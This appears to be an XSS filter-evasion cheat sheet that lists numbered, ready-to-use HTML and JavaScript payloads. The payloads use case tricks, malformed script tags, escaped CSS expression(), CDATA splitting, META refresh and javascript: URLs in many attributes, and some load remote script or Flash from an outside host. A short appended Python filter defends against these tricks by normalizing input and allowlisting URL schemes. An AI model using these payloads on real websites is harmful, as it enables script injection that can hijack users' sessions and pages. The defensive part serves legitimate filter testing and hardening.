1. Change the character case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Replace the .js extension with another extension

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
  background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> newline

(The tab and newline characters embedded inside "javascript" were collapsed to spaces when this copy was saved.)
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The hex-encoded form was decoded when this copy was saved, so only the decoded source survives for each pair.)
9. Script in HTML tag event-handler attributes

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
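Added defensive example, not part of the original post: every evasion in sections 1, 6, 7, 8 and 14 works because a blacklist filter inspects text the browser will never see in that form, so the filter below first decodes an attribute value the way the browser will (entities, CSS escapes and comments, embedded tab/newline, case) and then allowlists the URL scheme instead of searching for "javascript:". The function names, the ALLOWED_SCHEMES set and the sample inputs (built from the payloads above) are assumptions of this example.

```python
import html
import re

# Over-decoding (e.g. applying CSS escape rules to an href) can only make
# this check stricter, never looser, so one normalizer serves URL and CSS.
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6}\s?|.)", re.S)  # \6A , \s
_URL_JUNK = re.compile(r"[\t\n\r]")            # browsers drop these anywhere
_EDGE_JUNK = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")
_CSS_URL = re.compile(r"url\(\s*['\"]?([^)'\"]*)")
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed policy for this example


def _css_unescape(m):
    esc = m.group(1)
    if esc[0] in "0123456789abcdefABCDEF":     # hex escape: \6A -> 'j'
        code = int(esc.strip(), 16)
        return chr(code) if 0 < code <= 0x10FFFF else "\ufffd"
    return esc                                 # \s -> 's', so expre\ssion


def normalize(value):
    """Approximate the browser's view of an attribute value before checking it."""
    s = html.unescape(value)               # &#106;avascript and &#106avascript
    s = _CSS_COMMENT.sub("", s)            # expr/*anyword*/ession
    s = _CSS_ESCAPE.sub(_css_unescape, s)  # \ja\vasc\ript, expre\ssi\on
    s = _URL_JUNK.sub("", s)               # jav<TAB>ascr<LF>ipt
    return _EDGE_JUNK.sub("", s).lower()   # sCript, JaVaScRiPt


def naive_blacklist_allows(value):
    """The kind of check the payloads on this page are written to slip past."""
    return "javascript:" not in value


def url_is_allowed(value):
    """Accept relative URLs and allowlisted schemes; reject everything else."""
    m = _SCHEME.match(normalize(value))
    return m is None or m.group(1) in ALLOWED_SCHEMES


def css_is_allowed(value):
    """Reject expression(), @import and any url() with a non-allowlisted scheme."""
    s = normalize(value)
    if "expression(" in s or "@import" in s:
        return False
    return all(url_is_allowed(u) for u in _CSS_URL.findall(s))
```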